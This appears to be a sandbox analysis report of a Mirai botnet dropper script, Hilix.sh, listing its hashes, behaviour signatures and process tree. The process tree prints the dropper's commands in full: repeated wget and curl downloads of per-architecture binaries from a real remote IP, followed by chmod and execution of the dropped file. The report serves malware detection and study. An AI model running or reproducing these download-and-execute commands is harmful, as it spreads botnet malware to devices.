Overview

overview

10

Static

static

1

Hilix.sh

ubuntu-18.04-amd64

10

Hilix.sh

debian-9-armhf

10

Hilix.sh

debian-9-mips

10

Hilix.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    110s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    20-02-2025 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Hilix.sh

  • Size

    1KB

  • MD5

    7196d305e319b48d1c38c317b091c7de

  • SHA1

    cb78ce3f944836e9d577f9c560e2a8f517980119

  • SHA256

    40412ece69d1c10688039797c486809c1e2e37b52f0d3ac9410e50e7e8ef81d0

  • SHA512

    a3532d690518b21ffd451a9be324f1484a7a5cc4f5b196b568b5f4b4bf5087aa6a68845555f280a56cbd29ce33db5a82579f2b489dbeb80d7e1615d4e11e9966

Score
10/10
miraisorabotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

SORA

Extracted

Family

mirai

Botnet

SORA

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (184736) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 7 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 7 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Changes its process name 5 IoCs
  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Hilix.sh
    /tmp/Hilix.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:703
    • /usr/bin/wget
      wget http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Writes file to tmp directory
      PID:708
    • /usr/bin/curl
      curl -O http://37.221.67.207/bins/Hilix.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:728
    • /bin/cat
      cat Hilix.x86
      2⤵
        PID:734
      • /bin/chmod
        chmod +x Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
        2⤵
        • File and Directory Permissions Modification
        PID:735
      • /tmp/SSH
        ./SSH Hilix-SSH
        2⤵
          PID:736
        • /usr/bin/wget
          wget http://37.221.67.207/bins/Hilix.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /usr/bin/curl
          curl -O http://37.221.67.207/bins/Hilix.mips
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:739
        • /bin/cat
          cat Hilix.mips
          2⤵
          • System Network Configuration Discovery
          PID:740
        • /bin/chmod
          chmod +x Hilix.mips Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
          2⤵
          • File and Directory Permissions Modification
          PID:741
        • /tmp/SSH
          ./SSH Hilix-SSH
          2⤵
            PID:742
          • /usr/bin/wget
            wget http://37.221.67.207/bins/Hilix.mpsl
            2⤵
            • Writes file to tmp directory
            PID:744
          • /usr/bin/curl
            curl -O http://37.221.67.207/bins/Hilix.mpsl
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:745
          • /bin/cat
            cat Hilix.mpsl
            2⤵
              PID:770
            • /bin/chmod
              chmod +x Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
              2⤵
              • File and Directory Permissions Modification
              PID:771
            • /tmp/SSH
              ./SSH Hilix-SSH
              2⤵
              • Modifies Watchdog functionality
              • Changes its process name
              PID:772
            • /usr/bin/wget
              wget http://37.221.67.207/bins/Hilix.arm4
              2⤵
                PID:776
              • /usr/bin/curl
                curl -O http://37.221.67.207/bins/Hilix.arm4
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:786
              • /bin/chmod
                chmod +x Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
                2⤵
                • File and Directory Permissions Modification
                PID:801
              • /tmp/SSH
                ./SSH Hilix-SSH
                2⤵
                • Modifies Watchdog functionality
                • Changes its process name
                PID:802
              • /usr/bin/wget
                wget http://37.221.67.207/bins/Hilix.arm5
                2⤵
                • Writes file to tmp directory
                PID:807
              • /usr/bin/curl
                curl -O http://37.221.67.207/bins/Hilix.arm5
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:808
              • /bin/chmod
                chmod +x Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
                2⤵
                • File and Directory Permissions Modification
                PID:810
              • /tmp/SSH
                ./SSH Hilix-SSH
                2⤵
                • Modifies Watchdog functionality
                • Changes its process name
                PID:811
              • /usr/bin/wget
                wget http://37.221.67.207/bins/Hilix.arm6
                2⤵
                • Writes file to tmp directory
                PID:814
              • /usr/bin/curl
                curl -O http://37.221.67.207/bins/Hilix.arm6
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:817
              • /bin/chmod
                chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH systemd-private-1cbd810d56a34121887076f16a0fecb0-systemd-timedated.service-Oyyquc
                2⤵
                • File and Directory Permissions Modification
                PID:819
              • /tmp/SSH
                ./SSH Hilix-SSH
                2⤵
                • Modifies Watchdog functionality
                • Changes its process name
                PID:820
              • /usr/bin/wget
                wget http://37.221.67.207/bins/Hilix.arm7
                2⤵
                • Writes file to tmp directory
                PID:823
              • /usr/bin/curl
                curl -O http://37.221.67.207/bins/Hilix.arm7
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:838
              • /bin/chmod
                chmod +x Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.sh Hilix.x86 SSH
                2⤵
                • File and Directory Permissions Modification
                PID:861
              • /tmp/SSH
                ./SSH Hilix-SSH
                2⤵
                • Modifies Watchdog functionality
                • Changes its process name
                PID:862
              • /usr/bin/wget
                wget http://37.221.67.207/bins/Hilix.ppc
                2⤵
                • Writes file to tmp directory
                PID:865

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/SSH
              Filesize

              48KB

              MD5

              11863d3338efb145179a0f97dce5b8c1

              SHA1

              f2e14c388fdab6b68d9632190f0cbf6965c955f5

              SHA256

              0621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f

              SHA512

              87e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08

              Download Submit

            • /tmp/SSH
              Filesize

              71KB

              MD5

              200e03d27fc14205a10f0d5a030475d9

              SHA1

              188c13983b81ed439c8f0cc12039b465ba6616ca

              SHA256

              acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d

              SHA512

              af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89

              Download Submit

            • /tmp/SSH
              Filesize

              71KB

              MD5

              a23bd973e7ff662a50be1d058902f06c

              SHA1

              d32254694bcf9a61494f3edd1e0d96dd8866af95

              SHA256

              6f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e

              SHA512

              5ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df

              Download Submit